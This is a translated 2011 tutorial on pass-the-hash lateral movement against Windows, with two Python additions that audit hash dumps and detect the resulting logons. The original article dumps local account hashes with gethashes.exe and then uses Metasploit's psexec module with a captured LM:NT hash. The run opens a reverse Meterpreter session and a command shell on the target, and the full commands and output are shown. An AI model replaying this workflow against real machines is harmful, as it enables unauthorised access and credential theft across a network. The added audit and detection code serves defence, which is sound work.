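Pass-the-hash intrusion - logging in to Windows directly with a hash
Source: vfocus.net  Author: vfocus  Published: 2011-07-21

Network administrators are more and more security-conscious these days, and a complex password is a given. So what do we do during a penetration test when we have obtained the administrator's hash but, with a small hard disk, low bandwidth and poor hardware, cannot crack it?

Straight to the walkthrough... There are plenty of articles online about pass-the-hash attacks, so I won't repeat them. The scenario demonstrated here is particularly suited to internal network penetration: once we have administrative rights on one server, we carry on to the other servers on the internal network.
The usual first step is to recover the administrator password of the server we already hold and try it against the target server, but what if it cannot be cracked? Then we can use a pass-the-hash attack and log in to the target host with the hash directly, because we know that all the computer itself needs is for us to present a valid hash that carries the right privileges; the complicated maths and encryption are beyond us anyway~
Enough talk, on with the demonstration. First, on my PC (assumed to be the target host), I create a new user isosky and set a password for it, then obtain the hashes with one of the various tools available: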


C:\>net user isosky test
The command completed successfully.


C:\>gethashes.exe $local
1:1007:C2265B23734E0DACAAD3B435B51404EE:69943C5E63B4D2C104DBBCC15138B72B:::
Administrator:500:0A174C1272FCBCF7804E0502081BA8AE:83F36A86631180CB9F5F53F5F45DFB2B:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
HelpAssistant:1000:CF88594C2AC20629EEF3D6DABD2DA92D:0FCE98570CBB9C14E8FF200353B2707B:::
isosky:1003:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:F9E8AE6C7229EA07EFAC12715F954B83:::
__vmware_user__:1006:AAD3B435B51404EEAAD3B435B51404EE:915D1CEE456EA4DD6A8094F7CE094448:::

C:\>
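
An added example, not part of the original article: a Python audit of dumps in the user:RID:LM:NT::: format shown above. It flags stored LM hashes, empty passwords and NT hashes shared between hosts, the condition under which one captured hash is accepted by another server. The HOST-A lines are copied from the dump above; HOST-B and all function names are constructed for illustration.

```python
from collections import defaultdict

EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"  # LM hash of the empty string
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"  # NT hash of the empty password

# HOST-A lines come from the dump on this page; HOST-B is constructed.
DUMPS = {
    "HOST-A": """\
Administrator:500:0A174C1272FCBCF7804E0502081BA8AE:83F36A86631180CB9F5F53F5F45DFB2B:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
isosky:1003:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
""",
    "HOST-B": """\
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
isosky:1004:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
""",
}

def parse(dump):
    """Yield (user, lm, nt) for each well-formed pwdump line; skip the rest."""
    for line in dump.splitlines():
        p = line.strip().split(":")
        if len(p) >= 4 and p[1].isdigit() and len(p[2]) == len(p[3]) == 32:
            yield p[0], p[2].upper(), p[3].upper()

def audit(dumps):
    """Return (host, user, issue) tuples for every weakness found."""
    findings, seen = [], defaultdict(set)
    for host, dump in dumps.items():
        for user, lm, nt in parse(dump):
            if nt == EMPTY_NT:
                findings.append((host, user, "empty password"))
                continue
            if lm != EMPTY_LM:
                findings.append((host, user, "LM hash stored"))
                if lm.endswith(EMPTY_LM[:16]):  # second 7-char half is empty
                    findings.append((host, user, "password is 7 chars or fewer"))
            seen[nt].add((host, user))
    for where in seen.values():
        hosts = sorted({h for h, _ in where})
        if len(hosts) > 1:  # one captured hash authenticates on all of these
            users = "/".join(sorted({u for _, u in where}))
            findings.append((",".join(hosts), users, "NT hash reused across hosts"))
    return findings

if __name__ == "__main__":
    for finding in audit(DUMPS):
        print(*finding, sep=" | ")
```

Disabling LM hash storage and giving each machine a unique local administrator password clear the "LM hash stored" and "NT hash reused across hosts" findings.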

Then I go back to my BT virtual machine (the attacker host) and test with MSF; the PSEXEC module that ships with MSF supports pass-the-hash:

root@bt:~# msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12536 updated 76 days ago (2011.05.04)

Warning: This copy of the Metasploit Framework was last updated 76 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > set RHOST 192.168.0.254
RHOST => 192.168.0.254
msf exploit(psexec) > set SMBUser isosky
SMBUser => isosky
msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOST      192.168.0.254                                                      yes       The target address
   RPORT      445                                                                yes       Set the SMB service port
   SHARE      ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                                                          no        The Windows domain to use for authentication
   SMBPass    01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537  no        The password for the specified username
   SMBUser    isosky                                                             no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'isosky'...
[*] Uploading payload...
[*] Created \UGdecsam.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \UGdecsam.exe...
[*] Sending stage (749056 bytes) to 192.168.0.254
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877) at 2011-07-19 03:57:17 +0800

meterpreter > sysinfo
Computer        : ISOSKY-PC
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter > shell
Process 4596 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
__vmware_user__          1                        Administrator
Guest                    HelpAssistant            isosky
SUPPORT_388945a0
The command completed with one or more errors.


C:\WINDOWS\system32>

At this point we have successfully obtained a CMD shell on the target. Very simple, isn't it?
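
An added example, not part of the original article: detection logic for the trace the run above leaves on the target, an NTLM network logon followed within seconds by a service whose binary sits in the root of ADMIN$. It goes beyond the page's XP target by assuming the Security 4624 and System 7045 events that current Windows versions log; the event records, timestamps and function names are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed events, shaped like Security 4624 and System 7045 records.
EVENTS = [
    {"id": 4624, "time": "2011-07-19T03:57:10", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "isosky",
     "IpAddress": "192.168.0.3"},
    {"id": 7045, "time": "2011-07-19T03:57:12", "ServiceName": "MZsCnzjn",
     "ImagePath": r"%SYSTEMROOT%\UGdecsam.exe"},
    {"id": 4624, "time": "2011-07-19T09:00:00", "LogonType": 2,
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "isosky",
     "IpAddress": "127.0.0.1"},
    {"id": 7045, "time": "2011-07-19T09:30:00", "ServiceName": "Backup Agent",
     "ImagePath": r"C:\Program Files\Backup\agent.exe"},
]

# An executable directly in the Windows directory, which is where a file
# written to the root of the ADMIN$ share ends up.
ADMIN_ROOT_EXE = re.compile(r"^(%systemroot%|[a-z]:\\windows)\\[^\\]+\.exe$", re.I)

def correlate(events, window_s=60):
    """Return alerts for service installs preceded by an NTLM network logon."""
    window = timedelta(seconds=window_s)
    alerts, logons = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if (ev["id"] == 4624 and ev["LogonType"] == 3
                and ev["AuthenticationPackageName"] == "NTLM"):
            logons.append((when, ev))
        elif ev["id"] == 7045 and ADMIN_ROOT_EXE.match(ev["ImagePath"].strip('"')):
            for seen, logon in logons:
                if timedelta(0) <= when - seen <= window:
                    alerts.append({"service": ev["ServiceName"],
                                   "image": ev["ImagePath"],
                                   "user": logon["TargetUserName"],
                                   "source": logon["IpAddress"]})
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```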


 